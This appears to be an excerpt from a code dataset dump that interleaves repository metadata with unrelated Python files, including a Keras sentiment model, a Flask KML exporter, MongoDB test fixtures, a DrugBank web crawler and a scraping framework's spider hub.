self.draw()
if output is None:
output = StringIO()
self.fretboard.render(output)
return output
def save(self, filename):
with open(filename, 'w') as output:
self.render(output)
class BassChord(Chord):
strings = 4
class UkuleleChord(Chord):
strings = 4
inlays = (3, 5, 7, 10)
| 27.877698 | 116 | 0.543742 | 3,624 | 0.935226 | 0 | 0 | 0 | 0 | 0 | 0 | 242 | 0.062452 |
805364bb7db976a9ae2d3096d0339f8997426097 | 2,610 | py | Python | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | null | null | null | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | 3 | 2021-03-19T11:26:35.000Z | 2021-09-08T01:43:48.000Z | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | null | null | null | from keras.datasets import imdb
top_words = 10000
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=top_words)
#imdb.get_word_index()
word_dict = imdb.get_word_index()
word_dict = { key:(value + 3) for key, value in word_dict.items() }
word_dict[''] = 0 # Padding
word_dict['>'] = 1 # Start
word_dict['?'] = 2 # Unknown word
reverse_word_dict = { value:key for key, value in word_dict.items() }
print(' '.join(reverse_word_dict[id] for id in x_train[0]))
from keras.preprocessing import sequence
max_review_length = 500
x_train = sequence.pad_sequences(x_train, maxlen=max_review_length)
x_test = sequence.pad_sequences(x_test, maxlen=max_review_length)
from keras.models import Sequential
from keras.layers import Dense
from keras.layers.embeddings import Embedding
from keras.layers import Flatten
embedding_vector_length = 32
model = Sequential()
model.add(Embedding(top_words, embedding_vector_length, input_length=max_review_length))
model.add(Flatten())
model.add(Dense(16, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',optimizer='adam', metrics=['accuracy'])
print(model.summary())
hist = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=5, batch_size=128)
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
sns.set()
acc = hist.history['acc']
val = hist.history['val_acc']
epochs = range(1, len(acc) + 1)
plt.plot(epochs, acc, '-', label='Training accuracy')
plt.plot(epochs, val, ':', label='Validation accuracy')
plt.title('Training and Validation Accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.legend(loc='upper left')
plt.plot()
scores = model.evaluate(x_test, y_test, verbose=0)
print("Accuracy: %.2f%%" % (scores[1] * 100))
import string
import numpy as np
def analyze(text):
# Prepare the input by removing punctuation characters, converting
# characters to lower case, and removing words containing numbers
translator = str.maketrans('', '', string.punctuation)
text = text.translate(translator)
text = text.lower().split(' ')
text = [word for word in text if word.isalpha()]
# Generate an input tensor
input = [1]
for word in text:
if word in word_dict and word_dict[word] < top_words:
input.append(word_dict[word])
else:
input.append(2)
padded_input = sequence.pad_sequences([input], maxlen=max_review_length)
# Invoke the model and return the result
result = model.predict(np.array([padded_input][0]))[0][0]
return result | 33.461538 | 94 | 0.728736 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 466 | 0.178544 |
8053775f8d98b076220bbf63085b0a13451f988a | 2,145 | py | Python | Analytics/resources/moving_sensors/export_to_kml.py | thanosbnt/SharingCitiesDashboard | 5d123691d1f25d0b85e20e4e8293266bf23c9f8a | [
"Apache-2.0"
] | 4 | 2018-11-21T14:42:18.000Z | 2020-05-11T10:52:59.000Z | Analytics/resources/moving_sensors/export_to_kml.py | thanosbnt/SharingCitiesDashboard | 5d123691d1f25d0b85e20e4e8293266bf23c9f8a | [
"Apache-2.0"
] | 60 | 2018-11-21T15:11:59.000Z | 2019-12-02T10:46:44.000Z | Analytics/resources/moving_sensors/export_to_kml.py | thanosbnt/SharingCitiesDashboard | 5d123691d1f25d0b85e20e4e8293266bf23c9f8a | [
"Apache-2.0"
] | 7 | 2018-11-21T14:42:44.000Z | 2019-11-28T16:24:14.000Z | from http import HTTPStatus
import simplekml
from flask_jwt_extended import jwt_required
from flask_restful import Resource
from flask_restful import reqparse
from models.pin_location_data import Tracker
class ExportToKML(Resource):
"""
Export Location Data to KML
"""
def __init__(self) -> None:
"""
Set required arguments for GET request
"""
self.reqparser = reqparse.RequestParser()
self.reqparser.add_argument('tracker_id', required=True, type=str)
self.reqparser.add_argument('start_date', required=False,
store_missing=False, type=str)
self.reqparser.add_argument('end_date', required=False,
store_missing=False, type=str)
@jwt_required
def get(self) -> ({str: str}, HTTPStatus):
"""
Export Location data for Tracker to KML file
:param tracker_id: Tracker Id
:param start_date: Creation date of new data to export
:param end_date: Creation date of the oldest data to export
:return: JSON containing the filename and an HTTPStatus of 204(created)
otherwise an JSON error response with the appropriate HTTPStatus
"""
args = self.reqparser.parse_args()
kml = simplekml.Kml()
tracker = Tracker.get_by_tracker_id(args["tracker_id"])
if not tracker:
return {"error": "tracker with id {} not found".format(
args["tracker_id"])}, HTTPStatus.NOT_FOUND
path = kml.newlinestring(name="{}".format(tracker.id), description="",
coords=tracker.kml_coords)
path.style.linestyle.color = 'AA66CCff' # Red
path.style.linestyle.width = 3 # 10 pixels
try:
kml.save('{}.kml'.format(tracker.id))
except IOError as ioe:
return dict(error="Unable to create KML file",
traceback=ioe.with_traceback(ioe.__traceback__)), \
HTTPStatus.INTERNAL_SERVER_ERROR
return dict(file_name=args["tracker_id"] + ".kml"), HTTPStatus.CREATED
| 36.982759 | 79 | 0.621911 | 1,936 | 0.902564 | 0 | 0 | 1,361 | 0.634499 | 0 | 0 | 679 | 0.31655 |
80559713ec52ee98cc95d60ae305cc0f76247d7f | 4,658 | py | Python | graphene_mongo/tests/conftest.py | pfrantz/graphene-mongo | f7d4f3e194ec41793e6da547934c34e11fd9ef51 | [
"MIT"
] | null | null | null | graphene_mongo/tests/conftest.py | pfrantz/graphene-mongo | f7d4f3e194ec41793e6da547934c34e11fd9ef51 | [
"MIT"
] | null | null | null | graphene_mongo/tests/conftest.py | pfrantz/graphene-mongo | f7d4f3e194ec41793e6da547934c34e11fd9ef51 | [
"MIT"
] | null | null | null | import os
import pytest
from datetime import datetime
from .models import (
Article,
Editor,
EmbeddedArticle,
Player,
Reporter,
Child,
ProfessorMetadata,
ProfessorVector,
ChildRegisteredBefore,
ChildRegisteredAfter,
ParentWithRelationship,
CellTower,
Publisher,
)
current_dirname = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture()
def fixtures_dirname():
return os.path.join(current_dirname, "fixtures")
@pytest.fixture(scope="module")
def fixtures():
Publisher.drop_collection()
publisher1 = Publisher(name="Newsco")
publisher1.save()
Editor.drop_collection()
editor1 = Editor(
id="1",
first_name="Penny",
last_name="Hardaway",
metadata={"age": "20", "nickname": "$1"},
company=publisher1,
)
image_filename = os.path.join(current_dirname, "fixtures", "image.jpg")
with open(image_filename, "rb") as f:
editor1.avatar.put(f, content_type="image/jpeg")
editor1.save()
editor2 = Editor(id="2", first_name="Grant", last_name="Hill")
editor2.save()
editor3 = Editor(id="3", first_name="Dennis", last_name="Rodman")
editor3.save()
Article.drop_collection()
pub_date = datetime.strptime("2020-01-01", "%Y-%m-%d")
article1 = Article(headline="Hello", editor=editor1, pub_date=pub_date)
article1.save()
article2 = Article(headline="World", editor=editor2, pub_date=pub_date)
article2.save()
article3 = Article(headline="Bye", editor=editor2, pub_date=pub_date)
article3.save()
Reporter.drop_collection()
reporter1 = Reporter(
id="1",
first_name="Allen",
last_name="Iverson",
email="ai@gmail.com",
awards=["2010-mvp"],
generic_references=[article1]
)
reporter1.articles = [article1, article2]
embedded_article1 = EmbeddedArticle(headline="Real", editor=editor1)
embedded_article2 = EmbeddedArticle(headline="World", editor=editor2)
reporter1.embedded_articles = [embedded_article1, embedded_article2]
reporter1.embedded_list_articles = [embedded_article2, embedded_article1]
reporter1.generic_reference = article1
reporter1.save()
Player.drop_collection()
player1 = Player(
first_name="Michael",
last_name="Jordan",
articles=[article1, article2])
player1.save()
player2 = Player(
first_name="Magic",
last_name="Johnson",
opponent=player1,
articles=[article3])
player2.save()
player3 = Player(first_name="Larry", last_name="Bird", players=[player1, player2])
player3.save()
player1.players = [player2]
player1.save()
player2.players = [player1]
player2.save()
player4 = Player(first_name="Chris", last_name="Webber")
player4.save()
Child.drop_collection()
child1 = Child(bar="BAR", baz="BAZ")
child1.save()
child2 = Child(bar="bar", baz="baz", loc=[10, 20])
child2.save()
CellTower.drop_collection()
ct = CellTower(
code="bar",
base=[
[
[-43.36556, -22.99669],
[-43.36539, -23.01928],
[-43.26583, -23.01802],
[-43.36717, -22.98855],
[-43.36636, -22.99351],
[-43.36556, -22.99669],
]
],
coverage_area=[
[
[
[-43.36556, -22.99669],
[-43.36539, -23.01928],
[-43.26583, -23.01802],
[-43.36717, -22.98855],
[-43.36636, -22.99351],
[-43.36556, -22.99669],
]
]
],
)
ct.save()
ProfessorVector.drop_collection()
professor_metadata = ProfessorMetadata(
id="5e06aa20-6805-4eef-a144-5615dedbe32b",
first_name="Steven",
last_name="Curry",
departments=["NBA", "MLB"],
)
professor_vector = ProfessorVector(vec=[1.0, 2.3], metadata=professor_metadata)
professor_vector.save()
ParentWithRelationship.drop_collection()
ChildRegisteredAfter.drop_collection()
ChildRegisteredBefore.drop_collection()
# This is one messed up family
# She'd better have presence this time
child3 = ChildRegisteredBefore(name="Akari")
child4 = ChildRegisteredAfter(name="Kyouko")
child3.save()
child4.save()
parent = ParentWithRelationship(
name="Yui", before_child=[child3], after_child=[child4]
)
parent.save()
child3.parent = child4.parent = parent
child3.save()
child4.save()
return True
| 27.4 | 86 | 0.608201 | 0 | 0 | 0 | 0 | 4,273 | 0.917347 | 0 | 0 | 475 | 0.101975 |
80561b7e18a127e210a8a735291399c3216ea532 | 471 | py | Python | scratch.py | chappers/lightning-rl | 3c4ec35db983f256fc1ee82c9cab8ed8725bc58b | [
"MIT"
] | null | null | null | scratch.py | chappers/lightning-rl | 3c4ec35db983f256fc1ee82c9cab8ed8725bc58b | [
"MIT"
] | null | null | null | scratch.py | chappers/lightning-rl | 3c4ec35db983f256fc1ee82c9cab8ed8725bc58b | [
"MIT"
] | null | null | null | import curses
scr = curses.initscr()
curses.halfdelay(5) # How many tenths of a second are waited, from 1 to 255
curses.noecho() # Wont print the input
while True:
char = scr.getch() # This blocks (waits) until the time has elapsed,
# or there is input to be handled
scr.clear() # Clears the screen
if char != curses.ERR: # This is true if the user pressed something
scr.addstr(0, 0, chr(char))
else:
scr.addstr(0, 0, "Waiting")
| 33.642857 | 76 | 0.658174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 231 | 0.490446 |
805782c90511b1092705178abcf7d9ba97014167 | 669 | py | Python | src/thenewboston/factories/network_validator.py | achalpatel/thenewboston-python | 4044ce07cb5e0d1f92b4332bbd8c6ac8f33bcdb9 | [
"MIT"
] | 122 | 2020-07-12T23:08:49.000Z | 2021-12-18T16:14:10.000Z | src/thenewboston/factories/network_validator.py | achalpatel/thenewboston-python | 4044ce07cb5e0d1f92b4332bbd8c6ac8f33bcdb9 | [
"MIT"
] | 47 | 2020-07-15T02:18:09.000Z | 2021-09-22T19:51:59.000Z | src/thenewboston/factories/network_validator.py | achalpatel/thenewboston-python | 4044ce07cb5e0d1f92b4332bbd8c6ac8f33bcdb9 | [
"MIT"
] | 52 | 2020-07-13T10:49:52.000Z | 2021-10-30T03:34:55.000Z | from factory import Faker
from .network_node import NetworkNodeFactory
from ..constants.network import ACCOUNT_FILE_HASH_LENGTH, BLOCK_IDENTIFIER_LENGTH, MAX_POINT_VALUE, MIN_POINT_VALUE
from ..models.network_validator import NetworkValidator
class NetworkValidatorFactory(NetworkNodeFactory):
daily_confirmation_rate = Faker('pyint', max_value=MAX_POINT_VALUE, min_value=MIN_POINT_VALUE)
root_account_file = Faker('url')
root_account_file_hash = Faker('text', max_nb_chars=ACCOUNT_FILE_HASH_LENGTH)
seed_block_identifier = Faker('text', max_nb_chars=BLOCK_IDENTIFIER_LENGTH)
class Meta:
model = NetworkValidator
abstract = True
| 39.352941 | 115 | 0.807175 | 422 | 0.630792 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.035874 |
80581742c4e9dd6b7cf6b2c14279d454b5d3049b | 365 | py | Python | core/facade.py | vitorpvcampos/djmenu | 49f9984007c94474b50122d81727a96b9c6c56c3 | [
"MIT"
] | 10 | 2020-06-02T16:23:15.000Z | 2021-05-25T16:17:19.000Z | core/facade.py | vitorpvcampos/djmenu | 49f9984007c94474b50122d81727a96b9c6c56c3 | [
"MIT"
] | 241 | 2019-11-18T14:57:29.000Z | 2022-03-18T16:09:38.000Z | core/facade.py | vitorpvcampos/djmenu | 49f9984007c94474b50122d81727a96b9c6c56c3 | [
"MIT"
] | 3 | 2020-03-12T15:08:04.000Z | 2020-06-22T19:50:16.000Z | from menu.models import Menu
from products.models import Product, Category
def get_dashboard_data_summary():
cardapios = Menu.objects.all()
produtos = Product.objects.all()
categorias = Category.objects.all()
return {'total_cardapios': len(cardapios),
'total_produtos': len(produtos),
'total_categorias': len(categorias)}
| 28.076923 | 48 | 0.69863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.139726 |
8058a85467ead4f2df3d7aeae90f5f3cb7569943 | 9,954 | py | Python | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 5 | 2017-03-31T03:25:09.000Z | 2021-12-17T02:28:24.000Z | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 165 | 2016-08-11T01:59:47.000Z | 2017-10-10T06:32:12.000Z | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 11 | 2015-06-15T04:25:59.000Z | 2021-04-18T09:39:16.000Z | # crawl_drugbank.py
import time
import pickle
import json
import MySQLdb
import httplib
import urllib2 as urllib
from collections import defaultdict
import dbcrawler_util as util
from datetime import datetime
from bs4 import BeautifulSoup as bs
outDir = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002'
db = MySQLdb.connect("localhost","root","123","ijah" )
cursor = db.cursor()
def main():
#########
# drugProteinDict = parseUniprotlinkFile() # contain drug-protein binding info
# drugbankIdList = drugProteinDict.keys()
# drugbankIdList = ['DB01627','DB05101','DB05107','DB08423','DB05127']
# drugData = parseDrugWebpage(drugbankIdList)
# drugData = parseSmiles(drugbankIdList)
# fixDrugData()
def fixDrugData():
badWords = ['email','class="wrap"','.smiles','href']
old = None
smilesDict = None
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.ori.pkl'
with open(fpath, 'rb') as handle:
old = pickle.load(handle)
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_smiles_2016-10-05_12:35:37.724557.pkl'
with open(fpath, 'rb') as handle:
smilesDict = pickle.load(handle)
nOld = len(old)
new = old
idx = 0
for k,v in old.iteritems():
idx += 1
print 'fixing', k, 'idx=', str(idx), 'of', nOld
if 'SMILES' in v.keys():
oldSmiles = v['SMILES']
bad = False
for b in badWords:
if b in oldSmiles:
bad = True
break
if bad:
new[k]['SMILES'] = smilesDict[k]
else:
new[k]['SMILES'] = smilesDict[k]
for k2,v2 in v.iteritems():
for b in badWords:
if b in v2:
new[k][k2] = 'not-available'
assert(len(old)==len(new))
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.pkl'
with open(fpath, 'wb') as f:
pickle.dump(new, f)
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.json'
with open(fpath, 'w') as f:
json.dump(new, f, indent=2, sort_keys=True)
def parseUniprotlinkFile():
dpFpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/uniprot_links.csv'
now = datetime.now()
drugProteinDict = dict()
idx = 0
with open(dpFpath) as infile:
first = True
hot = ''
for line in infile:
if not(first):
idx += 1
print 'parsing idx=', idx
line = line.strip();
quoteIdx = [i for i,c in enumerate(line) if c=='"']; assert(len(quoteIdx)%2==0)
quoteIdx = [j for i,j in enumerate(quoteIdx) if i%2==0] # take only odd-indexed idx
words = line.split('"')
words2 = []
for w in words:
i = line.find(w) # just after an opening quote
w2 = w
if (i-1) in quoteIdx:
w2 = w.replace(',','$')
if len(w2)!=0:
words2.append(w2)
line = ' '.join(words2)
words = line.split(',');
words = words[0:4]
words = [w.strip() for w in words]
words = [w.replace('$',',') for w in words]
drugbankId = words[0]
name = words[1]
uniprotId = words[3]
if hot != drugbankId:
hot = drugbankId
drugProteinDict[hot] = defaultdict(list)
if len(drugProteinDict[hot]['name'])==0:
drugProteinDict[hot]['name'] = name
drugProteinDict[hot]['targetProtein'].append(uniprotId)
first = False
jsonFpath = outDir+'/drugbank_drug_vs_protein_'+str(now.date())+'_'+str(now.time())+'.json'
with open(jsonFpath, 'w') as f:
json.dump(drugProteinDict, f, indent=2, sort_keys=True)
pklFpath = outDir+'/drugbank_drug_vs_protein_'+str(now.date())+'_'+str(now.time())+'.pkl'
with open(pklFpath, 'wb') as f:
pickle.dump(drugProteinDict, f)
return drugProteinDict
def parseDrugWebpage(drugbankIdList): # e.g. http://www.drugbank.ca/drugs/DB05107
html = None
comData = dict()
now = datetime.now()
nDbId = len(drugbankIdList)
for idx, dbId in enumerate(drugbankIdList):
print 'parsing', dbId, 'idx=', str(idx+1), 'of', str(nDbId)
baseURL = 'http://www.drugbank.ca/drugs/'
url = baseURL+dbId
html = urllib.urlopen(url)
# baseFpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/'
# fpath = baseFpath+dbId+ '.html'
# with open(fpath, 'r') as content_file:
# html = content_file.read()
#
soup = bs(html, 'html.parser')
#
datum = defaultdict(list)
# datum['name'] = str(soup.title.string).split()[1].strip()
trList = soup.find_all('tr')
for tr in trList:
trStr = str(tr)
keys = ['InChI Key','CAS number','Chemical Formula','SMILES']
for k in keys:
if (k in trStr)and('.smiles' not in trStr)and('class="wrap"' not in trStr)and('href' not in trStr):
trStr = trStr.split('<td>')[1].replace('</td></tr>','')
trStr = trStr.replace('InChIKey=','')
trStr = trStr.replace('<div class="wrap">','').replace('</div>','')
trStr = trStr.replace('<sub>','').replace('</sub>','')
if ('wishart-not-available' in trStr) or trStr=='':
trStr = 'not-available'
# print trStr
datum[k] = trStr
aList = soup.find_all('a')
cidBaseUrl = 'http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi?cid='
sidBaseUrl = 'http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi?sid='
chemspiderBaseUrl = 'http://www.chemspider.com/Chemical-Structure.'
uniprotBaseUrl = 'http://www.uniprot.org/uniprot/'
for a in aList:
href = str(a.get('href'))
if cidBaseUrl in href:
datum['pubchemCid']= str(a.get('href').strip(cidBaseUrl))
elif sidBaseUrl in href:
datum['pubchemSid']= str(a.get('href').strip(sidBaseUrl))
elif chemspiderBaseUrl in href:
datum['chemspiderId'] = str(a.get('href').strip(chemspiderBaseUrl).strip('.html'))
elif uniprotBaseUrl in href:
datum['uniprotTargets'].append( str(a.get('href').strip(uniprotBaseUrl)) )
comData[dbId] = datum
if ((idx+1)%100)==0 or idx==(nDbId-1):
jsonFpath = outDir+'/drugbank_drug_data_'+str(now.date())+'_'+str(now.time())+'.json'
with open(jsonFpath, 'w') as f:
json.dump(comData, f, indent=2, sort_keys=True)
pklFpath = outDir+'/drugbank_drug_data_'+str(now.date())+'_'+str(now.time())+'.pkl'
with open(pklFpath, 'wb') as f:
pickle.dump(comData, f)
return comData
def parseSmiles(drugbankIdList):
now = datetime.now()
nDbId = len(drugbankIdList)
baseURL = 'http://www.drugbank.ca/structures/structures/small_molecule_drugs/'
smiles = dict()
for idx, dbId in enumerate(drugbankIdList):
print 'parsing', dbId, 'idx=', str(idx+1), 'of', str(nDbId)
s = 'not-available'
url = baseURL+dbId+'.smiles'
try:
s = urllib.urlopen(url)
except urllib.HTTPError, e:
print('HTTPError = ' + str(e.code))
except urllib.URLError, e:
print('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
print('HTTPException')
except Exception:
import traceback
print('generic exception: ' + traceback.format_exc())
s = bs(s, 'html.parser')
smiles[dbId] = str(s)
if ((idx+1)%100)==0 or idx==(nDbId-1):
jsonFpath = outDir+'/drugbank_drug_smiles_'+str(now.date())+'_'+str(now.time())+'.json'
with open(jsonFpath, 'w') as f:
json.dump(smiles, f, indent=2, sort_keys=True)
pklFpath = outDir+'/drugbank_drug_smiles_'+str(now.date())+'_'+str(now.time())+'.pkl'
with open(pklFpath, 'wb') as f:
pickle.dump(smiles, f)
# print smiles
return smiles
# def parseDrugbankVocab():
# fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_vocabulary.csv'
# with open(fpath) as infile:
# first = True
# idx = 0
# for line in infile:
# if not(first):
# idx += 1
# print 'updating idx=', idx
# line = line.strip()
# words = line.split(',')
# words = words[0:4]
# drugbankId = words[0]
# cas = words[3]
# cas = cas.replace('"','')
# if len(cas)!=0 and len(drugbankId)!=0:
# drugbankId = '"'+drugbankId+'"'
# cas = '"'+cas+'"'
# qf = 'UPDATE compound SET '
# qm = 'com_cas_id='+cas
# qr = ' WHERE com_drugbank_id='+drugbankId
# q = qf+qm+qr
# # print q
# util.mysqlCommit(db, cursor, q)
# first = False
if __name__ == '__main__':
start_time = time.time()
main()
print("--- %s seconds ---" % (time.time() - start_time))
| 35.55 | 140 | 0.544806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,595 | 0.361161 |
8058ac0f97a55a2585c802f841a4705f0c870641 | 1,051 | py | Python | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | null | null | null | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | 1 | 2021-03-27T15:52:06.000Z | 2021-03-27T15:52:06.000Z | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# flake8: noqa
# -------------- Add path of _k2.so into sys.path --------------
import os as _os
import sys as _sys
_current_module = _sys.modules[__name__]
_k2_dir = _os.path.dirname(_current_module.__file__)
if not hasattr(_current_module, "__path__"):
__path__ = [_k2_dir]
elif _k2_dir not in __path__:
__path__.append(_k2_dir)
_sys.path.append(__path__)
# ---------------------- Absolute import ----------------------
from k2._k2host import IntArray2Size
from k2._k2host import FbWeightType
from k2 import python
# ---------------------- Setting __all__ ----------------------
# Add more symbols in this file's scope that with names not start with '_'.
__all__.extend(
[_s for _s in dir() if not _s.startswith("_") and _s not in __all__]
)
# Explicitly avoid importing the wild star, like "from k2 import *".
# This give a suggestion for users to follow the conventional usage --
# just import needed symbols:
# from k2 import Fsa
# from k2.fsa import Fsa
__all__.extend(["DO_NOT_WILD_IMPORT"])
| 27.657895 | 75 | 0.652712 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 552 | 0.525214 |
80596cc485da66469ca3499c45d5b0772370bbd1 | 3,569 | py | Python | amipy/core/spiderhub.py | 01ly/Amipy | 254ef5cf1b34f9671ec8eecc3ee61633644b3ff8 | [
"MIT"
] | 24 | 2019-03-06T17:27:39.000Z | 2021-02-27T16:56:51.000Z | amipy/core/spiderhub.py | 01ly/Amipy | 254ef5cf1b34f9671ec8eecc3ee61633644b3ff8 | [
"MIT"
] | 1 | 2020-03-28T12:43:23.000Z | 2020-03-30T04:59:44.000Z | amipy/core/spiderhub.py | 01ly/Amipy | 254ef5cf1b34f9671ec8eecc3ee61633644b3ff8 | [
"MIT"
] | 13 | 2019-07-30T17:17:49.000Z | 2021-07-23T08:10:36.000Z | #coding:utf-8
'''
author : linkin
e-mail : yooleak@outlook.com
date : 2018-11-15
'''
import amipy
from amipy.BaseClass import Hub
from amipy.middlewares import MiddleWareManager
from amipy.util.load import load_py
from amipy.log import getLogger
class SpiderHub(Hub):
def __new__(cls, *args, **kwargs):
if not hasattr(cls,'_instance'):
cls._instance = super(SpiderHub, cls).__new__(cls)
return cls._instance
def __init__(self,settings,crawler):
super(SpiderHub, self).__init__()
self.settings = settings
self._success_counter = 0
self._failed_counter = 0
self._exception_counter = 0
self.active = False
self.looper = None
self._crawler = crawler
self.logger = getLogger(__name__)
self._set_queue()
def _set_queue(self):
_queue = self.settings.gets('PROJECT_REQUESTS_QUEUE')
self.requests = load_py(_queue)()
self.logger.debug(f'Loaded Requests Queue:{type(self.requests).__name__}')
def start(self,looper):
self.looper = looper
self.active = True
for i in self.spiders:
for seed in i.start_requests():
i.status = 'RUNNING'
if isinstance(seed, amipy.Request):
self.requests.put_nowait(seed)
if self.requests.empty():
print(f'* No start requests.Shutting down Amipy.\r\n')
raise StopAsyncIteration
self.logger.info(f'Got {self.requests.qsize()} start requests.')
def takeover(self,spiders):
self.spiders =spiders
self.logger.debug(f'Takeover:{[i.name+":"+i.__class__.__name__ for i in spiders]}')
self._binding()
def _binding(self):
for spider in self.spiders:
spider.binding_hub = self
spider.status = 'BOUND'
self.priorities += spider.priority
def accept(self,request):
_all_req = []
if isinstance(request,list):
for req in request:
if not isinstance(req, amipy.Request):
continue
else:
_all_req.append(req)
elif isinstance(request, amipy.Request):
_all_req.append(request)
return _all_req
@MiddleWareManager.handle_resp
def delegate(self,response):
_res = []
req = response.request
spider = response.spider
if response.status == 200:
self._success_counter += 1
spider._success += 1
self.logger.info(f'[Success]{spider.name} {req.method}-{req.url}')
a = self.accept(response.callback(response))
elif response.status == -1:
self._exception_counter += 1
spider._exc +=1
self.logger.info(f'[{response.exception.__class__.__name__}] {spider.name}'
f' {req.method}-{req.url} ')
a = self.accept(response.excback(response))
else:
self._failed_counter += 1
spider._fail += 1
self.logger.info(f'[{response.status} Error]{spider.name} {req.method}-{req.url}')
a = self.accept(response.errback(response))
_res.extend(a)
[self.requests.put_nowait(i) for i in _res if i]
def __str__(self):
return f'<SpiderHub obj at {hex(id(self))} active:{self.active}' \
f' [spiders:{len(self.spiders)} success:{self._success_counter} ' \
f'fail:{self._failed_counter} exc:{self._exception_counter}]>'
| 35.336634 | 94 | 0.591202 | 3,307 | 0.92659 | 0 | 0 | 1,008 | 0.282432 | 0 | 0 | 741 | 0.207621 |
3376cbd09166d238ee459563762207df8c790db5 | 194 | py | Python | contentcuration/contentcuration/test_settings.py | DXCanas/content-curation | 06ac2cf2a49d2420cb8a418f5df2bfee53ef644b | [
"MIT"
] | null | null | null | contentcuration/contentcuration/test_settings.py | DXCanas/content-curation | 06ac2cf2a49d2420cb8a418f5df2bfee53ef644b | [
"MIT"
] | null | null | null | contentcuration/contentcuration/test_settings.py | DXCanas/content-curation | 06ac2cf2a49d2420cb8a418f5df2bfee53ef644b | [
"MIT"
] | null | null | null | from .not_production_settings import * # noqa
DEBUG = True
WEBPACK_LOADER["DEFAULT"][ # noqa
"LOADER_CLASS"
] = "contentcuration.tests.webpack_loader.TestWebpackLoader"
TEST_ENV = True
| 19.4 | 60 | 0.752577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 91 | 0.469072 |
3378b86277aabe910e76e1f65855932a66f3625e | 1,050 | py | Python | estpop/simulation.py | defragworks/estpop | d843200cb9c7b8587db956ac0d15f0690da36c04 | [
"MIT"
] | null | null | null | estpop/simulation.py | defragworks/estpop | d843200cb9c7b8587db956ac0d15f0690da36c04 | [
"MIT"
] | null | null | null | estpop/simulation.py | defragworks/estpop | d843200cb9c7b8587db956ac0d15f0690da36c04 | [
"MIT"
] | null | null | null | import numpy as np
def ratios(pops1, pops2):
totals1 = np.array(pops1[0]) + np.array(pops1[1])
totals2 = np.array(pops2[0]) + np.array(pops2[1])
change_ratio = np.delete(totals2, 0) / np.delete(totals1, -1)
change_ratio = np.delete(change_ratio, -1)
baby_ratio = totals2[0] / np.sum(np.array(pops1[1])[3:10])
tail_ratio = totals2[-1] / np.sum(totals1[-2:])
return change_ratio.tolist(), baby_ratio, tail_ratio
def simulate(pops, change_ratio, baby_ratio, tail_ratio):
estimates = [[], []]
mothers = np.sum(np.array(pops[1])[3:10])
estimates[0].append(mothers * baby_ratio * (105 / (105 + 100)))
estimates[1].append(mothers * baby_ratio * (100 / (105 + 100)))
males = (np.array(pops[0])[:-2] * np.array(change_ratio)).tolist()
females = (np.array(pops[1])[:-2] * np.array(change_ratio)).tolist()
estimates[0] += males
estimates[1] += females
estimates[0].append(np.sum(pops[0][-2:]) * tail_ratio)
estimates[1].append(np.sum(pops[1][-2:]) * tail_ratio)
return estimates
| 32.8125 | 72 | 0.635238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
337be1ea8a2157dad08a162f07bb9bd2265babca | 2,710 | py | Python | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
